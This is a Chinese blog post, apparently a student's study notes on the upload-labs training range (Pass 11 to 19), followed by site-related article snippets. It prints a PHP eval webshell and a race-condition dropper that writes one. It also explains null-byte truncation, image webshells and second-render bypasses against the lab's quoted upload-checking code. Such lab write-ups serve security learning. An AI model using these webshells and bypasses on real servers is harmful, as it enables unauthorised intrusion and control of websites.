文件上传(11-19)

最新推荐文章于 2023-01-30 17:20:07 发布
最新推荐文章于 2023-01-30 17:20:07 发布
阅读量2.7k 收藏 2
点赞数 1
分类专栏: 小白入坑 笔记 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46601374/article/details/122385646
版权

今天看到了文件上传的靶场的源码,都是有flag文件的

看来我是少弄了亿点点

索性就把源码放在了虚拟机的小皮上(因为本机有mysql的环境,不舍得删除,还有用)

在老师的帮助下建立了一个新站

 然后搞出了中国蚁剑

再来搞flag

蚁剑是之前安装的,等我虚拟机安装的时候在出教程,先用上

先写一个1.php的文件

<?php
eval($_REQUEST[8])
?>

然后从回上次的Pass-01

上传成功以后,打开图片,把这个地址填到蚁剑里

 连接密码是8,以为PHP文件的答案就是8

然后测试连接

显示连接成功

就能进入站点

打开flag文件,获得flag

 蚁剑就是这么厉害!!!!

好了总算可以开始后面的了 前面的都是黑名单,后面的都是白名单

%00截断和00截断 

了解%00实际上我们要先了解0x00,0x00实际上是一个十六进制表示方式,实际上就是表示ascii码值为0,有些函数在处理这个字符的时候会把这个字符当做结束符,他们就读取到这里认为这一段结束了

在文件上传时,如果遇到了白名单机制只允许上传jpg后缀的,在没有解析漏洞的情况下我们该怎么办?

JPG格式并不会被解析,那么我们需要绕过上传过滤。 假如我写了1.php%00.jpg  传参之后,有些过滤都是直接匹配字符串,他强行匹配到了结尾是.jpg,然后允许上传,但是php的函数去执行的时候他读取到0x00认为结束了,那么这个文件就变成了1.php

%00实际上和00截断是一模一样的原理,只不过%00是经过URL编码的,%00解码后就是0x00截断的那个字符

Pass-11 (%00截断):

前面讲了%00截断,然后我们现在看题目,他会自动重命名,这是个头疼的问题,我们该如何解决

 这里很明显使用了直接的拼接,然而我们对$_GET['save_path']却没有任何检测,那么我们是可以构建的然后再%00,岂不是就可以绕过了。get提交1.php%00然后是不是最后就输出了1.php

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        }
        else{
            $msg = '上传失败!';
        }
    }
    else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

 

 

放到蚁剑上去, 得到了flag

Pass-12 (%00截断(二)):

这个东西和第一题很像,无非就是变成了POST方式提交save_path,问题在于POST方式我们用%00却失效了,这是因为POST传参并不会URL解码,所以需要我们该Hex改为00

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        }
        else{
            $msg = "上传失败";
        }
    }
    else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

欸欸欸欸额!!!这里的头部变成了action 

/upload/跑下面去了 !!!

回头去对比两个的源码,

获取save_path的传参方式变了

/upload/ 后面填写a.phpa

然后在hex里面把a(61)改为空(00)

 可以看到

 /upload/1.php

 但其实它后面是有空格的,只是看不到

放包文件就上传上去了

 又从蚁剑上得到flag 

Pass-13-16

(图片马绕过)(getimagesize图片类型绕过)(php_exif模块图片类型绕过)(二次渲染绕过):     这几题目实际上不能利用,只是要你上传一个图片马,必须配合文件包含使用

现在的检测都很厉害呀,图片马的图片一定是可以看见的完整是,而且不能太大,否则就会被发现的哦~~~~~~~

function getReailFileType($filename){
    $file = fopen($filename, "rb");
    $bin = fread($file, 2); //只读2字节
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);    
    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    
    $fileType = '';    
    switch($typeCode){      
        case 255216:            
            $fileType = 'jpg';
            break;
        case 13780:            
            $fileType = 'png';
            break;        
        case 7173:            
            $fileType = 'gif';
            break;
        default:            
            $fileType = 'unknown';
        }    
        return $fileType;
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_type = getReailFileType($temp_file);

    if($file_type == 'unknown'){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = $UPLOAD_ADDR."/".rand(10, 99).date("YmdHis").".".$file_type;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        }
        else{
            $msg = "上传失败";
        }
    }
}

见证图马的生成,图片要是二进制的格式(/b)才有可能不是乱码 

 图片马只能做到能上传,做不到能解析

图片完好

 成功绕过

 

 注意URL的路径是在后面加上/.php?8=phpinfo();

 

 在蚁剑上去找flag

getimagesize图片类型绕过 

这个函数功能会对目标文件的16进制去进行一个读取,去读取头几个字符串是不是符合图片的要求的

function isImage($filename){
    $types = '.jpeg|.png|.gif';
    if(file_exists($filename)){
        $info = getimagesize($filename);
        $ext = image_type_to_extension($info[2]);
        if(stripos($types,$ext)){
            return $ext;
        }else{
            return false;
        }
    }else{
        return false;
    }
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $res = isImage($temp_file);
    if(!$res){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = $UPLOAD_ADDR."/".rand(10, 99).date("YmdHis").$res;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        }
        else{
            $msg = "上传失败";
        }
    }
}

看见源码,要求文件只能是

   $types = '.jpeg|.png|.gif';

 所以呀,把上个合成的123.jpg后缀改为.jpeg试一试

 显示文件上传失败

图片显示是没有问题的,

那就重新换一个,换一个.fig的

 这回就成功了,可以发现这图中躺着的大白白,身上总有些小点点,这就是因为有木马嵌在文件里造成的不匹配,同理我们可以在做CTF题中,发现有这中问题,来找出木马

 

 然后再在蚁剑上去找flag

 我回来啦,继续继续,开始接着做呀(其实我想放弃了,真TM的费时间,虽然我回不了家,但我也不想学习)

 exif_imagetype() 读取一个图像的第一个字节检查其签名。如果发现了恰当的签名则返回一个对应的常量,否则返回 FALSE。返回值跟getimagesize() 返回的数组中的索引 2 的值是一样的,但exif_imagetype函数快得多。

function isImage($filename){
    //需要开启php_exif模块
    $image_type = exif_imagetype($filename);
    switch ($image_type) {
        case IMAGETYPE_GIF:
            return "gif";
            break;
        case IMAGETYPE_JPEG:
            return "jpg";
            break;
        case IMAGETYPE_PNG:
            return "png";
            break;    
        default:
            return false;
            break;
    }
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $res = isImage($temp_file);
    if(!$res){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = $UPLOAD_ADDR."/".rand(10, 99).date("YmdHis").".".$res;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        }
        else{
            $msg = "上传失败";
        }
    }
}

 把上一题的木马再上传上去

上传成功,点开看图片 ,看PHP

 

 将URL拖到蚁剑里面看flag

蚁剑连接成功

 

看下一题吧!!!!

二次渲染绕过

会对图片做处理,马会不见

最好用gif

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
    $filename = $_FILES['upload_file']['name'];
    $filetype = $_FILES['upload_file']['type'];
    $tmpname = $_FILES['upload_file']['tmp_name'];

    $target_path=$UPLOAD_ADDR.basename($filename);

    // 获得上传文件的扩展名
    $fileext= substr(strrchr($filename,"."),1);

    //判断文件后缀与类型,合法才进行上传操作
    if(($fileext == "jpg") && ($filetype=="image/jpeg")){
        if(move_uploaded_file($tmpname,$target_path))
        {
            //使用上传的图片生成新的图片
            $im = imagecreatefromjpeg($target_path);

            if($im == false){
                $msg = "该文件不是jpg格式的图片!";
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".jpg";
                $newimagepath = $UPLOAD_ADDR.$newfilename;
                imagejpeg($im,$newimagepath);
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = $UPLOAD_ADDR.$newfilename;
                unlink($target_path);
                $is_upload = true;
            }
        }
        else
        {
            $msg = "上传失败!";
        }

    }else if(($fileext == "png") && ($filetype=="image/png")){
        if(move_uploaded_file($tmpname,$target_path))
        {
            //使用上传的图片生成新的图片
            $im = imagecreatefrompng($target_path);

            if($im == false){
                $msg = "该文件不是png格式的图片!";
            }else{
                 //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".png";
                $newimagepath = $UPLOAD_ADDR.$newfilename;
                imagepng($im,$newimagepath);
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = $UPLOAD_ADDR.$newfilename;
                unlink($target_path);
                $is_upload = true;               
            }
        }
        else
        {
            $msg = "上传失败!";
        }

    }else if(($fileext == "gif") && ($filetype=="image/gif")){
        if(move_uploaded_file($tmpname,$target_path))
        {
            //使用上传的图片生成新的图片
            $im = imagecreatefromgif($target_path);
            if($im == false){
                $msg = "该文件不是gif格式的图片!";
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".gif";
                $newimagepath = $UPLOAD_ADDR.$newfilename;
                imagegif($im,$newimagepath);
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = $UPLOAD_ADDR.$newfilename;
                unlink($target_path);
                $is_upload = true;
            }
        }
        else
        {
            $msg = "上传失败!";
        }
    }else{
        $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
    }
}

还是我之前的那个马,一个好马可以反反复复的使用,主要是这个图马的php在头部

二次渲染好从底部找木马,这样就会找不到

 

 蚁剑连了

 

Pass-17(条件竞争):     

开始和服务器比手速的时候到了,我们用burp模块抓包然后去爆破就行,一个不断上传,一个不断访问

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = $UPLOAD_ADDR . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = $UPLOAD_ADDR . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传失败!';
    }
}

 

 

Pass-18(条件竞争2)(这题有Bug):     

实际上还是条件竞争,只不过做了各种检查,其实还是一样的,只不过这次要上传图片马。

//index.php
$is_upload = false;
$msg = null;
if (isset($_POST['submit']))
{
    require_once("./myupload.php");
    $imgFileName =time();
    $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
    $status_code = $u->upload($UPLOAD_ADDR);
    switch ($status_code) {
        case 1:
            $is_upload = true;
            $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
            break;
        case 2:
            $msg = '文件已经被上传,但没有重命名。';
            break; 
        case -1:
            $msg = '这个文件不能上传到服务器的临时文件存储目录。';
            break; 
        case -2:
            $msg = '上传失败,上传目录不可写。';
            break; 
        case -3:
            $msg = '上传失败,无法上传该类型文件。';
            break; 
        case -4:
            $msg = '上传失败,上传的文件过大。';
            break; 
        case -5:
            $msg = '上传失败,服务器已经存在相同名称文件。';
            break; 
        case -6:
            $msg = '文件无法上传,文件不能复制到目标目录。';
            break;      
        default:
            $msg = '未知错误!';
            break;
    }
}

//myupload.php
class MyUpload{
......
......
...... 
  var $cls_arr_ext_accepted = array(
      ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
      ".html", ".xml", ".tiff", ".jpeg", ".png" );

......
......
......  
  /** upload()
   **
   ** Method to upload the file.
   ** This is the only method to call outside the class.
   ** @para String name of directory we upload to
   ** @returns void
  **/
  function upload( $dir ){
    
    $ret = $this->isUploadedFile();
    
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->setDir( $dir );
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkExtension();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkSize();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }
    
    // if flag to check if the file exists is set to 1
    
    if( $this->cls_file_exists == 1 ){
      
      $ret = $this->checkFileExists();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }

    // if we are here, we are ready to move the file to destination

    $ret = $this->move();
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }

    // check if we need to rename the file

    if( $this->cls_rename_file == 1 ){
      $ret = $this->renameFile();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }
    
    // if we are here, everything worked as planned :)

    return $this->resultUpload( "SUCCESS" );
  
  }
......
......
...... 
};

靶场是先建立文件后审核时,我们就可以利用竞争条件漏洞。

创造一个马中马

<?php file_put_contents("555.php",'<?php eval($_REQUEST[8])?>');?> 

 开两个包,一个包疯狂上传,一个包疯狂访问

 

 

 

Pass-19(00截断):  

   这里又是一个00截断,做法和之前的%00截断没区别,第一开始也讲了,这两个其实原理一样,这里主要是用到了move_uploaded_file() ,这是移动文件的函数,上传上去然后移动到这边重命名

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists($UPLOAD_ADDR)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = $_POST['save_name'];
        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);

        if(!in_array($file_ext,$deny_ext)) {
            $img_path = $UPLOAD_ADDR . '/' .$file_name;
            if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $img_path)) { 
                $is_upload = true;
            }else{
                $msg = '上传失败!';
            }
        }else{
            $msg = '禁止保存为该类型文件!';
        }

    } else {
        $msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
    }
}

既然是00截断,那就去抓包吧

 

将upload//Pass-19 改为666.phpa

然后再在hex里,去将a(61)改为00

上传成功

 

 

 

 蚁剑连接成功

 

正在过坎
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP上传文件
lminstance的博客
10-17 96
选择文件,进行判断,并将文件传入到指定文件夹 <?php header('Content-type:text/html;charset=utf-8'); /* *实现文件上传 *$param1 array $file *$param2 aray $allow_type 允许上传的MIME类型 *$param3 string $path 存储路径 *$param4 string $error 出错原因 *$param5 array &allow_format = array() 允许上传文件
http 直接显示目录下文件_代码审计常见场景之文件操作
weixin_39573598的博客
11-24 270
文件上传1、关键词搜索move_uploaded_file ( string $filename , string $destination ) : bool本函数检查并确保由 filename 指定的文件是合法的上传文件(即通过 PHP 的 HTTP POST 上传机制所上传的)。如果文件合法,则将其移动为由 destination 指定的文件。2、场景代码html&...
web安全-文件上传漏洞-图片马制作-相关php函数讲解-upload靶场通关详细教学(3)
ran的博客
01-30 6310
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。的知识,比如我们平时在进行文件上传时,在我们上传文件后,网站会对图片进行二次处理(格式、尺寸、保存、删除要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。
文件上传漏洞靶场upload-labs学习(pass6-pass10)
AFCC_的博客(Web_Dog)
03-06 3120
0X00 Pass6 第6关从后缀绕过的角度考察,源码为: $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3"
文件上传漏洞-解析、验证、伪造2
Keepb1ue的博客
06-11 3931
在这里插入图片描述
内部有burner.exe,可以将S19文件转HEX;
06-24
S19格式便于程序的上传和下载,因为它允许用户进行部分或全部内存的更新。 HEX文件则是Intel HEX格式的简称,它是一种常见的用于存储十六进制数据的文本文件格式。HEX文件通常包含可执行代码、数据或者配置信息,...
X-COVID:使用深度学习(CNN)检测X射线图像中的COVID-19
04-19
6. **模型部署**:训练完成后的模型可以整合到医疗系统中,医生可以通过上传X射线图像,获取模型的预测结果,辅助诊断。 7. **Jupyter Notebook的应用**:Jupyter Notebook是数据科学领域常用的交互式开发环境,它...
2023-09-19.zip
最新发布
09-19
很抱歉,根据您提供的信息,"2023-09-19.zip"这个压缩包文件的描述中没有提及任何具体的IT知识点。通常,压缩文件(如.zip)是用来存储和传输多个文件或文件夹的便捷方式,它通过压缩数据来减小文件大小,便于快速...
libcgroup-0.41-19.el8.x86_64.rpm
04-21
该文件为centos 8安装docker需要的文件,由于官方源会下载失败,深知没有下载积分的烦恼,特在这里提供免费...为了不麻烦你们在Linux解压或者各种不方便解压的原因,这里就上传单独的文件可直接使用只能一个一个上传
imagenet-vgg-verydeep-19.part2.rar
02-15
做吴恩达第四课第四周作业时缺少vgg模型,就找了半天,外网下载较慢,所以上传至csdn上,供大家下载使用,但是文件较大,所以我压缩切割了6各部分,注意!!!!6个部分下载后放在同一文件夹下再解压!!!
暑假第二周练习(一)文件上传漏洞(二)
qidiandexiaowu
07-16 515
继续总结,烧脑! 目录: 0×01:白名单限制 0×02:内容限制 0×03:竞争条件 0×01 白名单限制 指名单内都是允许上传的格式。但是试验前,我们需要在php.ini里关闭magic_quotes_gpc函数。 常见的的截断:%00截断 和 0×00截断 在upload-labs的第12关里, 先看一下源码: $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png'
Upload-labs文件上传漏洞(上传路径可控)——Pass11
Zichel77的博客
07-28 1126
0×00 题目概述 0×01 源代码 $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1); if(in_array($file_ext,$
文件上传(一)
qq_48947141的博客
09-28 1746
一、文件上传概述 1.1、原理 在存在文件上传功能的页面,若没有对上传的文件进行检测、验证以及过滤。可能会导致恶意用户上传恶意脚本文件,被获取服务端的权限。 二、文件上传漏洞绕过 2.1、前端JS限制绕过 原理:浏览器通过JS代码对上传的文件进行格式验证 绕过方式: 1》可以通过Burp抓包修改上传文件的格式 2》修改JS其中关键的检测函数,或者直接禁用JS 漏洞代码分析: <script type="text/javascript...
thinkphp Upload上传文件在客户端生成的临时文件$_FILES['file']['tmp_name']
weixin_30646315的博客
05-05 1022
1.关于thinkphp 的Upload的$_FILES['file']['tmp_name']   在使用thinkphp上传图片的时候,在上传的$_FILES数组中,有一个$_FILES['file']['tmp_name']变量,那么这个变量是什么呢?他是上传图片时在客户端生成的临时文件,例如:$_FILES['file']['tmp_name'] = 'C:\window\7ED.tmp...
文件上传漏洞
m0_61506558的博客
08-06 628
1.1PHP代码文件上传
文件上传漏洞靶场upload-labs安装教程与通关记录
qq_43936524的博客
03-15 1326
文章目录靶场安装Pass-01 靶场安装 启动upload-labs镜像后创建upload文件夹用来存放上传的webshell,不手动创建进行上传操作时会报错。 Pass-01 防御类型: 前端js对上传文件进行检查 方法一: 修改界面运行时js的变量以绕过前端对文件格式的限制。 在92行进行判断前打断点后进行上传操作,运行到断点处时修改allow_ext为".jpg|.png|.gif|.php" ...
upload上传 内容绕过_upload-labs writeup
weixin_39629352的博客
11-21 442
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。github地址:https://github.com/c0ny1/upload-labs靶机包含漏洞类型分类: 如何判断上传漏洞类型: 以下是我做题的过程,建议首先黑盒测试,做不出的题再看源码。pass-01 前...
iis php报错无法屏蔽,IIS6.0环境下php页面错误
weixin_36373860的博客
03-10 99
win server 2003下,使用iis6.0的fastcgi方式配置了php5.4的环境,php解释器没有问题,能够解析phpinfo()简单的页面但是在一个php和html混合编程的页面(apache2.4环境下能正确运行),却不能正确运行,代码如下:上载文件表单请选择文件: $upload_file=$_FILES['upload_file']['tmp_name'];$upload_f...
php 通过 exif_imagetype() 判断网络图片是否存在!
libo_sina的专栏
07-11 4693
header("Content-type: text/html; charset=utf-8");     $t1 = time();  $check = array();    $h[0] = "http://www.edai.com/edai/Resource/album/201207/04/2012070402192453.jpg";  $h[1] = "http://www.e
resnet50-19c8e357离线
07-09
另外,离线模型还可以提供更高的隐私保护,因为数据不需要通过网络上传到云端进行计算。 总而言之,resnet50-19c8e357 离线表示一个 ResNet50 模型的特定版本,在无需联网的情况下,直接从本地设备上加载模型权重...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值